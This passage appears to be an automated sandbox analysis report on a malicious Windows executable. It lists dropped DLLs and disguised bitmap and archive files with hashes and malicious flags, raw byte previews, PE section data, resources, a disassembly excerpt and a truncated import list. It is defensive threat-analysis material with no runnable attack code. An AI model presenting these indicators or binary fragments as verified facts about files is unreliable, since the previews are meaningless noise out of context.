Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...J(.`.........."!.........~...............0.......................................r....@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	79792
Entropy (8bit):	6.778797048504205
Encrypted:	false
SSDEEP:	1536:hExZIDobDaHrrAPsCbU4qzBHXpHolecbGpJGBNzZz3:yZPDaHrrobUHzDQecbGbGN
MD5:	9D5A742F221C4929A178BAF2B93FC7FB
SHA1:	928C9E0E1C18EC474C2F450CA00A154E44AC547A
SHA-256:	F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
SHA-512:	F4614962C67BB41B8A2FB17E3112745F4BA012BBF382C1CC7DEACD6C8525A53D75890A2EB46F0DA61BFA054DC52505B09A29291D5FA1C25C6201A66B9DC4B547
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L...19............"!.........................................................P............@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\IemFNe\libcef.dll

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	524288000
Entropy (8bit):	0.03653807744214944
Encrypted:	false
SSDEEP:
MD5:	A497F0BEE04EE4D4F7BEBDACB139C9DA
SHA1:	78A06BC3690509016D7285D3E76D2CFD4E945B56
SHA-256:	7326A18775A980FDE53F0E0B5C3003A58AB4C6C08B129FA453510425D88A6558
SHA-512:	0EA1AA71364C1DAA7A29BB400AC38A9C8ABC584D96B82860C4B62F37BA65FE138E4A8380B2890635E52BA757F9EF6E4E97504D64B7401BAA82B49BBB8FAB9240
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..........4.......!..........)......9.......c.........1.....0.....7....Rich...........PE..L....@.f...........!.........0......$].......................................0............@.........................pI......t6.......0..X....................@..l...................................X(..@............................................text...!........................... ..`.rdata..Z...........................@..@.data.......p.......T..............@....rsrc...X....0......................@..@.reloc..V....@......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\IemFNe\t3d.tmp

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	6443425
Entropy (8bit):	7.999970882342927
Encrypted:	true
SSDEEP:	98304:7c5bWQVHWXS1k+CxcfLg3LFvsI0i/2tEn+ynekhscRZ+Q3FqFoJSnerSgkogC6qz:7c5FNB7WRjsUZn5h/+e7Vkokqg8iEHCu
MD5:	FB936CD4F33E5AE9AB88D7AE21B8D654
SHA1:	157DF7F219BB272F2DC56B3AA0BD5CE70E4902DA
SHA-256:	3C55279D70BBAAA18DCA653DD5922BEAE2F720B8285D6A195A21961DE005BCF2
SHA-512:	F72254B4CE87CAAFA12DD2DDEEC7B77DABEE2FC052E3CA102E55C5ABCC7F99FD4EE6A8544F5942D2A75EDF66C406CB20A0978E9E378055B79EFFB820094AADC1
Malicious:	false
Preview:	PK........R..Y................text/UT....1.f.1.f.1.fPK..........7X........x.......text/MSVCP140.dllUT.....ej..f2M.f.z.0I\pq...7....N...y..A....L.:.v.FF.e}.F."..._.....hI.g....M_.....]..x..h.\....xh...=X....R. .....W2O#-.u..-sZ.%.ST..=.{...3W>...h./.(...nL..&.+~.^BY..<..:.T..k......jq.[...n.T..{h....../c..iAj..+..\|..\|.x\.:L.S...C.@r..M.u....`%..fJK].^.;$)...(.H.$...W1;c..9;fLF.....h..!=\|.z..<.2..A ..<.=T.(.t-....j.K<.z>.Uu.....>a..".-,7.\.Q.k...'#.....P....G.[H;...}.h........}.i..x...!sVN.8....G.&_#...]J...._g]..G....,f.RJ...U/...w.d.........v.-........!.A=\\Un.....f....5c`7.[..t.:..J1.../HV.%..6I....I....B.e.j.".....>...($....\|:.Wb..wAx.......B.MX}b.p..k.05.5^%.w.C.... ua}.......:..?u...!j[..0;!...Bi..d..i.F.2T..2.....m..gC.}.R....2.J...7.J$u)...#oo.DD...$..P.OTzy.D.F..S5.)i.......A\....]..t...P4..R..;O..._k.F..@..1......j.a.."..<...V.m....je...I....lO.........\|sl.".J..X..l8C..xqR."e.yt`.6.o8!.E...#.uA.S../..Vh...q...Q.....4JN^...;Q..v

C:\Program Files (x86)\IemFNe\t4d.tmp

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	PC bitmap, Windows 3.x format, 556 x 556 x 32, image size 1236544, cbSize 1236598, bits offset 54
Category:	dropped
Size (bytes):	1236598
Entropy (8bit):	7.382378338793816
Encrypted:	false
SSDEEP:	24576:CXptT9TEpaNPwRTOMcEBe0rOZsdEjQGOeK+GKe66/uV:CZXFNoRk10aZsWjQIBGT
MD5:	DAE17C69D8F4A253C008A4EC7CF45D9F
SHA1:	A3B99D5CAF55F9CA22E79AABF1AFA6CC9FFC80EC
SHA-256:	6DB78BD2576F2023F09775B0968EB9F83BB78B8575808402CD06D985BE3D0161
SHA-512:	AC54F2E31B25EEFCC5C690AC1A30D13489590D92AA25962B51CDC59E9B0E1490F7C994B5F1202C7922DFBAFEDAD4030137980FC05CF1515B8BE18ABED04173D1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	BMv.......6...(...,...,..... .....@...................*R..d...c...........g...'...g...g...g...g...g...g...g...g.......i...g...F..L.)Th.{ p.ggr.e c.fno.(beGzunGan #GS .gdeI...C...g......A...........4........F..........).....9...................1......0......7....5ach...g...g...7M..+....H.fg...g......!l...g...g8..g...CU..g...g...g...g...g...b...g...b...g...g8..g...g...e.@.g...g...g...g...g...w....A.......>......g8..?...g...g...g...g...gH......g...g...g...g...g...g...g...g...? ..'...g...g...g.......g...g...g...g...g...g...I\|ex....F...g...g...g...g...g...g...G..`Izda.i..=...g...g...g...g...g...g...'..@Ilat........gx..g...g\..g...g...g...'...Izsr....?...g8..g...g...g...g...g...'..@Izel.k..1...gH..g...g...g...g...g...'..Bg...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.

C:\Program Files (x86)\IemFNe\t5d.tmp

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
Category:	dropped
Size (bytes):	2485
Entropy (8bit):	6.802741157932193
Encrypted:	false
SSDEEP:	48:8BO8xOk10hBJoLiJRw7lsjXml1yB8aUGLMvv9H3zRb2AcHbRzxaVoWUoM9QMCS:8Bek10hBGLiJRw7lsjXmlIuaUGLMv1HW
MD5:	932E9573B165AC805AEA8058EA0B9743
SHA1:	8C1BF5DB1B8D905664C72D4683245CF81014438F
SHA-256:	C44FC4EDA2166C8819E226452C43A3C063FDC2B11E8422C83A9C5DC05EB0AEF4
SHA-512:	B0752C551135303F4B5CA481C07ADC334D46953AAFAE6F432EA0BF5286E2E854D63DD9019CF144E2B773C86F875C8D19F2DD125C215AB335D38E5AC0E3DB504E
Malicious:	false
Preview:	BM.......6...(...z...y..... .........................2.....s.....0.g.S3..\$;.\$..\$..\$..@..H.V0.B..@$.7 ..T.;.....U.....ara......i.)..g...d.Iu...............g...g3.u.;.S.R<.$..g.Ph.O.i.L$0....g.t$W.D$_`.e.N.a....,8.#,Dh.......g.t$'.D$7`..!..za...#,X.. .DC.P.#,.n.llf.L$....TC .tC(....+.n.K.g..tC .DCHh.6^f.^.......#,8.N...T..<fku1.t...}....d.+.\|f.eu{.\|.cku..t...}.....d...\|f.etqI..oZ.....g..........j'...g8..1..$.....x S.\$8.D$\|.$.g....(P.3,<.#,\|..(.._X..C...g.T$#.D$.b@V.x,S.\$8.D$\|.$.g....$P.3,<.#,\|..$.HG.D._X..C...g.T$#.D$..H,d@ .#,.W.:_.#@8..,..g..DC.P.#,.3U&df.L$ .d.\C*.TC .tC(...6......g..tC .DC@hi..y.b....\|$0.L$T..\.1...g..tC0.DChhI.>.....\|$@.L$l.$..e...g..tC@.DCphj.._......\|$P.$.g..h.(.&....g.t$?..$.......1x...g...'.t$G.D$;`.=.9.~c....,(.#,hhT.0p.d..g....L$`.$.g..P....g.T$#..tnW^3.S..:.DCt8XOb..;,$t`.,.g.......g..$.....p4.>b..;,$t`...g.......gQ3..U.....1_j...3....}..}..[ .$L.....@f..j'`.0g.h.g..W.[..$P;.h.%.g..}o.u..Kd.d.Ch.E.Q0_P.4,..h...g..}o..E..p..K\..@...u..H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tant[1].bmp

Download File

Process:	C:\Users\user\Desktop\N6xnw0iEGs.exe
File Type:	data
Category:	dropped
Size (bytes):	137736
Entropy (8bit):	6.877702986476462
Encrypted:	false
SSDEEP:	1536:psgfX6W9AtyRB1xKNrt7eHsYnBvNk3CIsrNSbgskHW1ICZqkVZCVXTIs:pPfqW911i8Hv5b4gzAI2jZCV3
MD5:	00F5198C4C4594CDBCE74ACC9C25E826
SHA1:	E580A39954E3D69052DA85241628C282C8A315C2
SHA-256:	852EFCFA8F982839391DB539C178E1D774197E7FEEC5E12A9C6A0FA341F980E0
SHA-512:	9B891A42EA697E7B64D4E88E9E90B427ED1E3A72FAA4F6B7C656310F1A1D2D98061C9C0A083594B0EB9BE7C2556EA878331A53D5098D824565C191DB89604E71
Malicious:	false
Preview:	.l..l4U......g.....nlh.ll.hhl..>....P.il........ml.S9:Wj.4je..$.l.._.Xj.5jn7.lZ._f..H..llf..H..llXj^...H...l4j...$.l..4.df..$.ll.X..$.ll...H4..H..ll..H...l.$.l....$.ll...H..llf..H..llf..H..llf..H..llf..H..llf..H..llf..H..ll.DHPS.8H=f.($>...DH,pf.($P ..DH>a.(HSf.($T ..DH:b. HW.(HXa. $Y..D$6.Af.($D:..LHf.(HGt..D$%..TH&.DH'A.8HL.8HMf.($N..f.(H\V..L$2..DH3tu.($a..T$..D$.<.LH..DH.ot...DH.t..H..llF..H..ll.H...l.sh%.$.l.....$.l......H...l..$.l....ti..$.ll.o..Y..H..ll.LH..LH..LH...H...l......H...l..$.l../.ch.($l+.D$..Na...DH.iv.($u?.st..D$..I.0H\|f.($}..f..H..llRt..$.ll...H..llA..H..ll..H...l..H...lu..H..ll.H...l.ti..$.l.....$.l..8..H...l...H...l.w.ll..-.^...k.ll....$.ll.jt.$.l..4...H...l...H...l.D$p<..H...l.\$X<UU..j.3.D$(..\|Hx.DHt.DHXPU.($...\|$r<.tHD...bXf.($...D$z.D$0.D$t.$.l..<9.DHpP..H(....X..D$x..DHz..H...l.D$t.$.l..<9.DHpP..H(....^.($l..t$x.D$t.$.l..<9.DHpf..H.P..$(..j.4..DHxf.(H..(H<.(H...H..llPU.($.<.t$D...H..llf..H..(H...H..llPU.($...t$r<.tHD...($P..\|$x.D$t.$.l..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948998975552655
TrID:	Win32 Executable (generic) a (10002005/4) 98.81% Windows ActiveX control (116523/4) 1.15% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	N6xnw0iEGs.exe
File size:	31'561'216 bytes
MD5:	8f6f306ba501a7e435db720bb97cb1e4
SHA1:	66de656287a3bff5a7bf89f9a0972d679e3afe3f
SHA256:	c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7
SHA512:	33140e4ebd897ac76da0e2caf7b03a7938c49408fc1be5dbc6a07c15258c3cb9211dd86dde999f502b53e2f7d4947446d81c57eb18137eed92c22657bdeb4ec6
SSDEEP:	786432:08Mc+2YBT6yL1+5FFg3qmMB4RR2qO+Nkpzsn:5i2GT6S4pg3qmg4qQipz
TLSH:	FD67333174D1907BC6332631A79DB364B2FDFF710A364247739D2A2E2F709829A18667
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7F..s'x.s'x.s'x..P..x'x..P..r'x..P..{'x.s'y.N$x..P..Z'x.....Z'x......'x......&x.....z'x.....r'x.s'..r'x.....r'x.Richs'x........

File Icon


Icon Hash:	0e0f3311b34d6faa

Static PE Info

General

Entrypoint:	0x52bb24
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x55AE32B9 [Tue Jul 21 11:53:29 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	e6724325d4bf7b236f902a73ca987202

Entrypoint Preview

Instruction
call 00007F2ACC820D0Dh
jmp 00007F2ACC8181D4h
cmp ecx, dword ptr [005AD218h]
jne 00007F2ACC818354h
rep ret
jmp 00007F2ACC81D1A6h
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+14h]
test esi, esi
jne 00007F2ACC818356h
xor eax, eax
jmp 00007F2ACC8183BFh
mov eax, dword ptr [ebp+08h]
test eax, eax
jne 00007F2ACC818365h
call 00007F2ACC819899h
push 00000016h
pop esi
mov dword ptr [eax], esi
call 00007F2ACC821321h
mov eax, esi
jmp 00007F2ACC8183A5h
push edi
mov edi, dword ptr [ebp+10h]
test edi, edi
je 00007F2ACC818366h
cmp dword ptr [ebp+0Ch], esi
jc 00007F2ACC818361h
push esi
push edi
push eax
call 00007F2ACC81C6AAh
add esp, 0Ch
xor eax, eax
jmp 00007F2ACC818388h
push dword ptr [ebp+0Ch]
push 00000000h
push eax
call 00007F2ACC81A028h
add esp, 0Ch
test edi, edi
jne 00007F2ACC81835Bh
call 00007F2ACC819858h
push 00000016h
jmp 00007F2ACC81835Eh
cmp dword ptr [ebp+0Ch], esi
jnc 00007F2ACC818365h
call 00007F2ACC81984Ah
push 00000022h
pop esi
mov dword ptr [eax], esi
call 00007F2ACC8212D2h
mov eax, esi
jmp 00007F2ACC818355h
push 00000016h
pop eax
pop edi
pop esi
pop ebp
ret
push ebp
mov ebp, esp
xor edx, edx
mov eax, edx
cmp dword ptr [ebp+0Ch], eax
jbe 00007F2ACC818363h
mov ecx, dword ptr [ebp+08h]
cmp word ptr [ecx], dx
je 00007F2ACC81835Bh
inc eax
add ecx, 02h
cmp eax, dword ptr [ebp+0Ch]
jc 00007F2ACC818344h
pop ebp
ret
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+14h]
test esi, esi
jne 00007F2ACC818356h
xor eax, eax
jmp 00007F2ACC8183C2h
mov ecx, dword ptr [ebp+00h]

Rich Headers

Programming Language:

[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1a47cc	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1b7000	0x1c09379	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1dc1000	0x1db00	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x156d30	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x189ac0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x156000	0xa48	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1548e1	0x154a00	c5d4a51ee5f44283ad03c19dade9049b	False	0.5627616112385321	data	6.546158618487326	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x156000	0x51faa	0x52000	ce429c0321fea1e23575a90421c4d7ca	False	0.27663514672256095	data	5.015281370472236	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a8000	0xe190	0x6a00	a174cb13bfef882903b1fcb77a0ae5e7	False	0.27126326650943394	data	4.7756039904513825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1b7000	0x1c09379	0x1c09400	0ab7673e02600a8e08e55b45054aaeaa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1dc1000	0x6283a	0x62a00	6b96737d9c8b7cbf92adf4ddf79861cb	False	0.12608671974017743	data	2.771861215289247	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
BIN	0x1b7fa0	0x4bd75	PE32 executable (console) Intel 80386, for MS Windows	Chinese	China	0.7765842038339584
FLAC	0x203d18	0x1b3d634	FLAC audio bitstream data, 16 bit, stereo, 44.1 kHz, 10540358 samples			0.9913301467895508
GIF	0x1d4134c	0x6e9	GIF image data, version 89a, 21 x 36	Chinese	China	0.7377049180327869
GIF	0x1d41a38	0xbb	GIF image data, version 89a, 16 x 64	Chinese	China	1.0267379679144386
GIF	0x1d41af4	0x99a	GIF image data, version 89a, 16 x 16	Chinese	China	0.7074857607811229
GIF	0x1d42490	0xa4b	GIF image data, version 89a, 295 x 24	Chinese	China	0.8223908918406072
JS	0x1d42edc	0x16bb3	ASCII text, with very long lines (32072)	Chinese	China	0.3524224816608848
JS	0x1d59a90	0xd39	ASCII text, with very long lines (3385), with no line terminators	Chinese	China	0.3893648449039882
PNG	0x1d5a7cc	0xa842	PNG image data, 455 x 342, 8-bit/color RGB, non-interlaced	Chinese	China	0.988926034266611
PNG	0x1d65010	0xbbb	PNG image data, 85 x 96, 8-bit/color RGB, non-interlaced	Chinese	China	0.994005994005994
RT_CURSOR	0x1d65bcc	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Chinese	China	0.4805194805194805
RT_CURSOR	0x1d65d00	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Chinese	China	0.7
RT_CURSOR	0x1d65db4	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.36363636363636365
RT_CURSOR	0x1d65ee8	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.35714285714285715
RT_CURSOR	0x1d6601c	0x134	data	Chinese	China	0.37337662337662336
RT_CURSOR	0x1d66150	0x134	data	Chinese	China	0.37662337662337664
RT_CURSOR	0x1d66284	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Chinese	China	0.36688311688311687
RT_CURSOR	0x1d663b8	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Chinese	China	0.37662337662337664
RT_CURSOR	0x1d664ec	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.36688311688311687
RT_CURSOR	0x1d66620	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.38636363636363635
RT_CURSOR	0x1d66754	0x134	data	Chinese	China	0.44155844155844154
RT_CURSOR	0x1d66888	0x134	data	Chinese	China	0.4155844155844156
RT_CURSOR	0x1d669bc	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.5422077922077922
RT_CURSOR	0x1d66af0	0x134	data	Chinese	China	0.2662337662337662
RT_CURSOR	0x1d66c24	0x134	data	Chinese	China	0.2824675324675325
RT_CURSOR	0x1d66d58	0x134	data	Chinese	China	0.3246753246753247
RT_BITMAP	0x1d66e8c	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Chinese	China	0.44565217391304346
RT_BITMAP	0x1d66f44	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Chinese	China	0.37962962962962965
RT_ICON	0x1d67088	0x15900	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Chinese	China	0.99921875
RT_ICON	0x1d7c988	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.41658286998698685
RT_ICON	0x1d8d1b0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	Chinese	China	0.4269497582509985
RT_ICON	0x1d96658	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	Chinese	China	0.44101503759398497
RT_ICON	0x1d9ce40	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	Chinese	China	0.4510166358595194
RT_ICON	0x1da22c8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.48447094945677843
RT_ICON	0x1da64f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.5012448132780083
RT_ICON	0x1da8a98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.5609756097560976
RT_ICON	0x1da9b40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.5745901639344262
RT_ICON	0x1daa4c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.7012411347517731
RT_DIALOG	0x1daa930	0x40	data	Chinese	China	0.8125
RT_DIALOG	0x1daa970	0x90	data	Chinese	China	0.6736111111111112
RT_DIALOG	0x1daaa00	0xe2	data	Chinese	China	0.6769911504424779
RT_DIALOG	0x1daaae4	0x34	data	Chinese	China	0.8653846153846154
RT_STRING	0x1daab18	0x4e	data	Chinese	China	0.8461538461538461
RT_STRING	0x1daab68	0x2c	data	Chinese	China	0.5909090909090909
RT_STRING	0x1daab94	0x84	data	Chinese	China	0.9166666666666666
RT_STRING	0x1daac18	0x1c4	data	Chinese	China	0.8053097345132744
RT_STRING	0x1daaddc	0x14e	data	Chinese	China	0.5179640718562875
RT_STRING	0x1daaf2c	0x10e	data	Chinese	China	0.7037037037037037
RT_STRING	0x1dab03c	0x50	data	Chinese	China	0.7125
RT_STRING	0x1dab08c	0x44	data	Chinese	China	0.6764705882352942
RT_STRING	0x1dab0d0	0x68	data	Chinese	China	0.7019230769230769
RT_STRING	0x1dab138	0x1b2	data	Chinese	China	0.6474654377880185
RT_STRING	0x1dab2ec	0xf4	data	Chinese	China	0.6065573770491803
RT_STRING	0x1dab3e0	0x24	data	Chinese	China	0.4722222222222222
RT_STRING	0x1dab404	0x1a6	data	Chinese	China	0.6658767772511849
RT_GROUP_CURSOR	0x1dab5ac	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China	1.0294117647058822
RT_GROUP_CURSOR	0x1dab5d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab5e4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab5f8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab60c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab620	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab634	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab648	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab65c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab670	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab684	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab698	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab6ac	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab6c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1dab6d4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_ICON	0x1dab6e8	0x92	Targa image data - Map 32 x 22784 x 1 +1	Chinese	China	0.7054794520547946
RT_VERSION	0x1dab77c	0x2bc	data	Chinese	China	0.5085714285714286
RT_HTML	0x1daba38	0x146f6	HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (4938), with CRLF line terminators	Chinese	China	0.2183221428400755
RT_MANIFEST	0x1dc0130	0x249	XML 1.0 document, ASCII text	English	United States	0.576068376068376

Imports

DLL	Import
KERNEL32.dll	GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetTimeZoneInformation, GetStringTypeW, GetSystemTimeAsFileTime, GetConsoleMode, ReadConsoleW, SetFilePointerEx, LCMapStringW, WriteConsoleW, SetEnvironmentVariableA, HeapQueryInformation, HeapSize, GetFileType, SetStdHandle, IsProcessorFeaturePresent, IsDebuggerPresent, VirtualQuery, VirtualAlloc, GetModuleHandleExW, ExitProcess, CreatePipe, HeapReAlloc, RtlUnwind, HeapAlloc, ExitThread, CreateThread, QueryPerformanceCounter, GetCommandLineW, FindResourceExW, VirtualProtect, Sleep, GetProfileIntW, SearchPathW, GetWindowsDirectoryW, GetTempPathW, GetTempFileNameW, SetErrorMode, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, CompareStringW, GetCurrentDirectoryW, GlobalFlags, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, DuplicateHandle, UnlockFile, SetFilePointer, SetEndOfFile, LockFile, GetVolumeInformationW, GetFullPathNameW, GetFileSize, FlushFileBuffers, DeleteFileW, GetFileTime, GetFileSizeEx, GetFileAttributesExW, FindFirstFileW, FindClose, GetThreadLocale, GetStartupInfoW, GetProcessHeap, HeapFree, GetStdHandle, GlobalGetAtomNameW, LocalReAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, InterlockedIncrement, WritePrivateProfileStringW, GetPrivateProfileStringW, GetPrivateProfileIntW, ResumeThread, SetThreadPriority, lstrcpyW, CompareStringA, lstrcmpA, GetVersionExW, GetCurrentThread, GlobalFindAtomW, GlobalAddAtomW, LoadLibraryA, lstrcmpW, GlobalDeleteAtom, GetSystemDirectoryW, DecodePointer, EncodePointer, LoadLibraryW, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetVersion, OutputDebugStringA, GetFileAttributesW, InterlockedDecrement, FileTimeToSystemTime, LocalAlloc, LoadLibraryExW, FreeLibrary, FileTimeToLocalFileTime, SetLastError, CopyFileW, FormatMessageW, MulDiv, LocalFree, GlobalFree, GlobalSize, GetTickCount, GetQueuedCompletionStatus, SetEvent, WideCharToMultiByte, WaitForSingleObject, InterlockedExchange, ResetEvent, RaiseException, PostQueuedCompletionStatus, GetSystemInfo, TerminateThread, GetExitCodeThread, LeaveCriticalSection, EnterCriticalSection, CreateIoCompletionPort, DeleteCriticalSection, CreateEventW, InitializeCriticalSectionAndSpinCount, OutputDebugStringW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, AddVectoredExceptionHandler, CreateMutexW, WriteFile, CreateFileW, FreeResource, GlobalUnlock, GlobalLock, GlobalAlloc, GetLastError, 